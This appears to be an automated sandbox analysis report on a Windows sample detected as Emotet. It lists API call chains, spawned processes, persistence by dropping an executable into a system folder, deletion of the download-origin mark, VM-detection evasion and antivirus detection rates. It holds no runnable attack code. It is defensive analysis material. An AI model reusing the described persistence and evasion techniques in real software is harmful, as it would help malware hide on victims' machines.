Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0060380E	0_2_0060380E
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_006080CE	0_2_006080CE
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_006058AE	0_2_006058AE
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_00408293	1_2_00408293
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_004145CA	1_2_004145CA
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C8240	1_2_022C8240
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C7740	1_2_022C7740
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C6530	1_2_022C6530
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C3BA0	1_2_022C3BA0
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C3F20	1_2_022C3F20
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C1C70	1_2_022C1C70
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C3D10	1_2_022C3D10

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: String function: 00406520 appears 168 times
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: String function: 00405626 appears 44 times
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: String function: 00406520 appears 174 times
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: String function: 00405626 appears 49 times

Source: 2ojdmC51As.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2ojdmC51As.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 2ojdmC51As.exe, 00000000.00000000.228277630.000000000043C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameEffectDemo.EXEN vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.232241587.0000000002B10000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.232241587.0000000002B10000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.232088249.0000000002A10000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe	Binary or memory string: OriginalFilenameEffectDemo.EXEN vs 2ojdmC51As.exe

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Source: 2ojdmC51As.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal88.troj.evad.winEXE@16/5@0/100

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Code function: 0_2_00418C88 __EH_prolog,GetDiskFreeSpaceA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,

0_2_00418C88

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,

0_2_021E87D0

Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe

Code function: 1_2_022C4CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification,

1_2_022C4CB0

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Code function: 0_2_00412121 __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,

0_2_00412121

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Code function: 0_2_021E5070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,

0_2_021E5070

Source: C:\Windows\System32\conhost.exe

Mutant created: \BaseNamedObjects\Local\SM0:4672:120:WilError_01

Source: 2ojdmC51As.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\2ojdmC51As.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 2ojdmC51As.exe	Virustotal: Detection: 76%
Source: 2ojdmC51As.exe	Metadefender: Detection: 67%
Source: 2ojdmC51As.exe	ReversingLabs: Detection: 88%

Source: unknown	Process created: C:\Users\user\Desktop\2ojdmC51As.exe 'C:\Users\user\Desktop\2ojdmC51As.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe C:\Windows\SysWOW64\WsmSvc\iasrecst.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Process created: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,

0_2_004013A4

Source: 2ojdmC51As.exe

Static PE information: real checksum: 0x69574 should be: 0x6a2b7

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00406520 push eax; ret	0_2_0040653E
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00406830 push eax; ret	0_2_0040685E
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E5E10 push ecx; mov dword ptr [esp], 0000F5B3h	0_2_021E5E11
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E5EA0 push ecx; mov dword ptr [esp], 0000A3FDh	0_2_021E5EA1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E5EF0 push ecx; mov dword ptr [esp], 0000669Ch	0_2_021E5EF1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E5F20 push ecx; mov dword ptr [esp], 0000E36Ch	0_2_021E5F21
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E5CD0 push ecx; mov dword ptr [esp], 00001CE1h	0_2_021E5CD1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E5D00 push ecx; mov dword ptr [esp], 00001F9Eh	0_2_021E5D01
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E5D20 push ecx; mov dword ptr [esp], 0000C5A1h	0_2_021E5D21
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E5D50 push ecx; mov dword ptr [esp], 00006847h	0_2_021E5D51
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E5D90 push ecx; mov dword ptr [esp], 0000B2E0h	0_2_021E5D91
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E5DC0 push ecx; mov dword ptr [esp], 000089FAh	0_2_021E5DC1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E5DF0 push ecx; mov dword ptr [esp], 0000AAF5h	0_2_021E5DF1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0060786E push ecx; mov dword ptr [esp], 00001CE1h	0_2_0060786F
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_006078EE push ecx; mov dword ptr [esp], 00006847h	0_2_006078EF
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_006078BE push ecx; mov dword ptr [esp], 0000C5A1h	0_2_006078BF
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0060789E push ecx; mov dword ptr [esp], 00001F9Eh	0_2_0060789F
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0060795E push ecx; mov dword ptr [esp], 000089FAh	0_2_0060795F
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0060792E push ecx; mov dword ptr [esp], 0000B2E0h	0_2_0060792F
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_006079AE push ecx; mov dword ptr [esp], 0000F5B3h	0_2_006079AF
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0060798E push ecx; mov dword ptr [esp], 0000AAF5h	0_2_0060798F
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0061EA26 push ebp; iretd	0_2_0061EA28
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00607A3E push ecx; mov dword ptr [esp], 0000A3FDh	0_2_00607A3F
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_00406520 push eax; ret	1_2_0040653E
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_00406830 push eax; ret	1_2_0040685E
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C5E10 push ecx; mov dword ptr [esp], 0000F5B3h	1_2_022C5E11
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C5EA0 push ecx; mov dword ptr [esp], 0000A3FDh	1_2_022C5EA1
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C5EF0 push ecx; mov dword ptr [esp], 0000669Ch	1_2_022C5EF1
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C5F20 push ecx; mov dword ptr [esp], 0000E36Ch	1_2_022C5F21
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C5CD0 push ecx; mov dword ptr [esp], 00001CE1h	1_2_022C5CD1
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C5D20 push ecx; mov dword ptr [esp], 0000C5A1h	1_2_022C5D21

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Executable created and started: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe

Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe

PE file moved: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\2ojdmC51As.exe

File opened: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0042252B IsWindowVisible,IsIconic,	0_2_0042252B
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004198B0 GetParent,GetParent,GetParent,IsIconic,	0_2_004198B0
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00404F00 IsIconic,GetWindowPlacement,GetWindowRect,	0_2_00404F00
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_0042252B IsWindowVisible,IsIconic,	1_2_0042252B
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_004198B0 GetParent,GetParent,GetParent,IsIconic,	1_2_004198B0
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_00404F00 IsIconic,GetWindowPlacement,GetWindowRect,	1_2_00404F00

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Show sources

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_0-28812

Source: C:\Users\user\Desktop\2ojdmC51As.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,

0_2_021E5070

Source: C:\Users\user\Desktop\2ojdmC51As.exe	API coverage: 3.4 %
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	API coverage: 4.5 %

Source: C:\Windows\System32\svchost.exe TID: 4652	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 896	Thread sleep time: -120000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\2ojdmC51As.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004182CC FindFirstFileA,FindClose,	0_2_004182CC
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	0_2_00417B29
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,	0_2_021E38F0
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_004182CC FindFirstFileA,FindClose,	1_2_004182CC
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	1_2_00417B29
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,	1_2_022C38F0

Source: svchost.exe, 00000006.00000002.498296170.0000020745862000.00000004.00000001.sdmp	Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000007.00000002.498004562.0000021F63F40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.305034649.000002922C540000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.356381490.0000027463460000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.379325879.00000228E6D40000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.412752585.000001DCAEE00000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: iasrecst.exe, 00000001.00000003.327469162.0000000002981000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.494606751.0000020740229000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.411985154.000001DCADEEC000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.498004562.0000021F63F40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.305034649.000002922C540000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.356381490.0000027463460000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.379325879.00000228E6D40000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.412752585.000001DCAEE00000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000007.00000002.498004562.0000021F63F40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.305034649.000002922C540000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.356381490.0000027463460000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.379325879.00000228E6D40000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.412752585.000001DCAEE00000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: iasrecst.exe, 00000001.00000002.499375661.0000000002970000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWP9
Source: svchost.exe, 00000016.00000002.411896397.000001DCADE85000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW`
Source: svchost.exe, 00000007.00000002.494919022.0000021F63268000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.494467171.0000020BD3429000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000007.00000002.498004562.0000021F63F40000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.305034649.000002922C540000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.356381490.0000027463460000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.379325879.00000228E6D40000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.412752585.000001DCAEE00000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe

API call chain: ExitProcess graph end node

graph_1-26885

Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,

0_2_004013A4

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,

0_2_004013A4

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E4E20 mov eax, dword ptr fs:[00000030h]	0_2_021E4E20
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E3F20 mov eax, dword ptr fs:[00000030h]	0_2_021E3F20
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0060095E mov eax, dword ptr fs:[00000030h]	0_2_0060095E
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_006069BE mov eax, dword ptr fs:[00000030h]	0_2_006069BE
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C4E20 mov eax, dword ptr fs:[00000030h]	1_2_022C4E20
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_022C3F20 mov eax, dword ptr fs:[00000030h]	1_2_022C3F20
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_02281030 mov eax, dword ptr fs:[00000030h]	1_2_02281030

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Code function: 0_2_021E42F0 GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,

0_2_021E42F0

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00409C36 SetUnhandledExceptionFilter,	0_2_00409C36
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00409C48 SetUnhandledExceptionFilter,	0_2_00409C48
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_00409C36 SetUnhandledExceptionFilter,	1_2_00409C36
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_00409C48 SetUnhandledExceptionFilter,	1_2_00409C48

Source: iasrecst.exe, 00000001.00000002.496377265.0000000000CE0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: iasrecst.exe, 00000001.00000002.496377265.0000000000CE0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: iasrecst.exe, 00000001.00000002.496377265.0000000000CE0000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: iasrecst.exe, 00000001.00000002.496377265.0000000000CE0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: iasrecst.exe, 00000001.00000002.496377265.0000000000CE0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Code function: 0_2_00406204 GetLocalTime,GetSystemTime,GetTimeZoneInformation,

0_2_00406204

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Code function: 0_2_00406204 GetLocalTime,GetSystemTime,GetTimeZoneInformation,

0_2_00406204

Source: C:\Users\user\Desktop\2ojdmC51As.exe

Code function: 0_2_00425FF1 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,

0_2_00425FF1

Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: svchost.exe, 0000000B.00000002.494381263.000001FB9AA40000.00000004.00000001.sdmp	Binary or memory string: (@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 0000000B.00000002.494510769.000001FB9AB02000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.494960467.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.231317711.0000000002194000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.496587282.0000000002284000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.230964663.0000000000600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.2ojdmC51As.exe.21e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.iasrecst.exe.71052e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.iasrecst.exe.71279e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2ojdmC51As.exe.60279e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.iasrecst.exe.71052e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2ojdmC51As.exe.60052e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.iasrecst.exe.71279e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.iasrecst.exe.22c0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2ojdmC51As.exe.60279e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2ojdmC51As.exe.60052e.2.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
